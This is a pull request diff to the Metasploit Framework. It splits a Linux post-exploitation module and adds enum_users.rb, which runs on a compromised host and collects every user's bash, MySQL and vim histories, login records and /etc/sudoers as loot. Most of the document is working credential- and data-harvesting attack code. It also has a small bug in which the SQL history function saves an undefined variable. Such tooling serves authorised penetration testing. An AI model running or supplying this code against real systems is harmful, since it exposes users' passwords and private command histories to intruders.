### PR TITLE
Split enum_system into enum_users and enum_system

### DIFF
--- a/modules/post/linux/gather/enum_system.rb
+++ b/modules/post/linux/gather/enum_system.rb
@@ -65,15 +65,17 @@ class Metasploit3 < Msf::Post
 		installed_svc = get_services(distro[:distro])
 
 		mount = execute("/bin/mount -l")
-		get_bash_history(users, user)
 		crons = get_crons(users, user)
+		diskspace = execute("/bin/df -ahT")
+		disks = (mount +"\n\/"+ diskspace)
 		
 		save("Linux version", distro)
 		save("User accounts", users)
 		save("Installed Packages", installed_pkg)
 		save("Running Services", installed_svc)
 		save("Cron jobs", crons)
-		save("Mount", mount)
+		#save("Mount", mount)
+		save("Disk info", disks)
 
 	end
 
@@ -171,27 +173,4 @@ class Metasploit3 < Msf::Post
 		return cron_data
 
 	end
-
-	def get_bash_history(users, user)
-		if user == "root" and users != nil
-			users = users.chomp.split()
-			users.each do |u|
-				if u == "root"
-					vprint_status("Extracting history for #{u}")
-					hist = cat_file("/root/.bash_history")
-				else
-					vprint_status("Extracting history for #{u}")
-					hist = cat_file("/home/#{u}/.bash_history")
-				end
-
-				save("History for #{u}", hist) unless hist =~ /No such file or directory/
-			end
-		else
-			vprint_status("Extracting history for #{user}")
-			hist = cat_file("/home/#{user}/.bash_history")
-			vprint_status(hist)
-			save("History for #{user}", hist) unless hist =~ /No such file or directory/
-		end
-	end
-
 end

--- a/modules/post/linux/gather/enum_users.rb
+++ b/modules/post/linux/gather/enum_users.rb
@@ -1,0 +1,161 @@
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/system'
+require 'msf/core/post/linux/priv'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Linux::System
+
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'Linux User Information',
+				'Description'   => %q{ This module gathers user specific information.
+							User list, bash history, mysql history, vim history,
+							lastlog and sudoers. 
+							},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 
+						    'ohdae <bindshell@live.com>' # based largely on get_bash_history function by Stephen Haywood
+						    ],
+				'Version'       => '$Revision$',
+				'Platform'      => [ 'linux' ],
+				'SessionTypes'  => [ 'shell' ]
+			))
+
+	end
+
+	def run
+		distro = get_sysinfo
+
+		print_good("Info:")
+		print_good("\t#{distro[:version]}")
+		print_good("\t#{distro[:kernel]}")
+
+		users = execute("/bin/cat /etc/passwd | cut -d : -f 1")
+		user = execute("/usr/bin/whoami")
+
+		mount = execute("/bin/mount -l")
+		get_bash_history(users, user)
+		get_sql_history(users, user)
+		get_vim_history(users, user)
+		last = execute("/usr/bin/last && /usr/bin/lastlog")
+		sudoers = cat_file("/etc/sudoers")
+
+		save("Last logs", last)
+		save("Sudoers", sudoers) unless sudoers =~ /Permission denied/
+
+	end
+
+	def save(msg, data, ctype="text/plain")
+		ltype = "linux.enum.users"
+		loot = store_loot(ltype, ctype, session, data, nil, msg)
+		print_status("#{msg} stored in #{loot.to_s}")
+	end
+
+	def get_host
+		case session.type
+		when /meterpreter/
+			host = sysinfo["Computer"]
+		when /shell/
+			host = session.shell_command_token("hostname").chomp
+		end
+
+		print_status("Running module against #{host}")
+
+		return host
+	end
+
+	def execute(cmd)
+		vprint_status("Execute: #{cmd}")
+		output = cmd_exec(cmd)
+		return output
+	end
+
+	def cat_file(filename)
+		vprint_status("Download: #{filename}")
+		output = read_file(filename)
+		return output
+	end
+
+	def get_bash_history(users, user)
+		if user == "root" and users != nil
+			users = users.chomp.split()
+			users.each do |u|
+				if u == "root"
+					vprint_status("Extracting history for #{u}")
+					hist = cat_file("/root/.bash_history")
+				else
+					vprint_status("Extracting history for #{u}")
+					hist = cat_file("/home/#{u}/.bash_history")
+				end
+
+				save("History for #{u}", hist) unless hist =~ /No such file or directory/
+			end
+		else
+			vprint_status("Extracting history for #{user}")
+			hist = cat_file("/home/#{user}/.bash_history")
+			vprint_status(hist)
+			save("History for #{user}", hist) unless hist =~ /No such file or directory/
+		end
+	end
+
+	def get_sql_history(users, user)
+		if user == "root" and users != nil
+			users = users.chomp.split()
+			users.each do |u|
+				if u == "root"
+					vprint_status("Extracting SQL history for #{u}")
+					sql_hist = cat_file("/root/.mysql_history")
+				else
+					vprint_status("Extracting SQL history for #{u}")
+					sql_hist = cat_file("/home/#{u}/.mysql_history")
+				end
+
+				save("History for #{u}", hist) unless sql_hist =~ /No such file or directory/
+			end
+		else
+			vprint_status("Extracting SQL history for #{user}")
+			sql_hist = cat_file("/home/#{user}/.mysql_history")
+			vprint_status(sql_hist)
+			save("SQL History for #{user}", sql_hist) unless sql_hist =~ /No such file or directory/
+		end
+	end
+
+	def get_vim_history(users, user)
+		if user == "root" and users != nil
+			users = users.chomp.split()
+			users.each do |u|
+				if u == "root"
+					vprint_status("Extracting VIM history for #{u}")
+					vim_hist = cat_file("/root/.viminfo")
+				else
+					vprint_status("Extracting VIM history for #{u}")
+					vim_hist = cat_file("/home/#{u}/.viminfo")
+				end
+
+				save("VIM History for #{u}", vim_hist) unless vim_hist =~ /No such file or directory/
+			end
+		else
+			vprint_status("Extracting history for #{user}")
+			vim_hist = cat_file("/home/#{user}/.viminfo")
+			vprint_status(vim_hist)
+			save("VIM History for #{user}", vim_hist) unless vim_hist =~ /No such file or directory/
+		end
+	end
+end


### PR DESCRIPTION
enum_users.rb contains all user specific tasks:
- bash history
- mysql history
- vim history
- lastlog
- read sudoers if permissions allow it

enum_system.rb contains all system specific tasks:
- same tasks as before, except removed bash_history and moved it to enum_users.
- added disk space info (df -ahT)
- disk space and mount info saves to one file
